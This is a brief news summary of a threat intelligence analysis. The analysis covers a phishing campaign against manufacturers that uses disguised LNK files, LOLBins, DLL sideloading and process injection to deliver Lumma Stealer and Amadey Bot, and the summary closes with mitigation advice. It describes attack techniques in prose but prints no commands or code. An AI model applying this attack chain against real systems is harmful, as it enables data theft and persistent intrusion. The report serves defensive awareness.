A recent analysis by Cyble Research and Intelligence Labs (CRIL) has shed light on a concerning cyberattack campaign targeting the manufacturing industry. This multi-stage attack utilizes process injection techniques to deploy dangerous payloads, including Lumma Stealer and Amadey Bot.
The threat actor (TA) behind this campaign employs various evasive tactics to bypass traditional security defenses, paving the way for potential data theft and persistent control over compromised systems.
The attack begins with a spear-phishing email containing a link to an LNK file disguised as a PDF document. This file, hosted on a WebDAV server, poses a challenge for security software to detect. By exploiting the name of a legitimate cloud-based document management system, the attacker lures victims into clicking on the malicious link.
Once the LNK file is executed, it triggers a series of commands through legitimate system utilities like ssh.exe and mshta.exe, fetching additional payloads from remote servers. The use of advanced techniques like Google’s Accelerated Mobile Pages (AMP) framework and shortened URLs further complicates detection, culminating in the delivery of the final malicious payload.
The attack also leverages Living-off-the-Land Binaries (LOLBins) and DLL sideloading to evade detection. By using legitimate executables like powershell.exe and exploiting DLL files alongside trusted applications, the attackers can execute malicious code in memory, making it harder for security software to identify malicious behavior.
The deployment of Lumma Stealer and Amadey Bot enables the attackers to steal sensitive data and maintain control over compromised systems. The attackers establish persistence through techniques like Task Scheduler and msiexec.exe, ensuring that the malware remains undetected and operational even after system reboots.
To address the risks posed by such sophisticated attacks, organizations are advised to strengthen their email filtering systems, educate users about phishing dangers, and monitor the use of LOLBins. Mitigating measures such as disabling unnecessary services, implementing application whitelisting, and deploying advanced network and URL filtering can help prevent attacks like those using Lumma Stealer and Amadey Bot.
By taking proactive steps to restrict PowerShell scripts and other scripting languages, organizations can enhance their defenses against cyber threats, safeguarding sensitive data and critical infrastructure from malicious actors.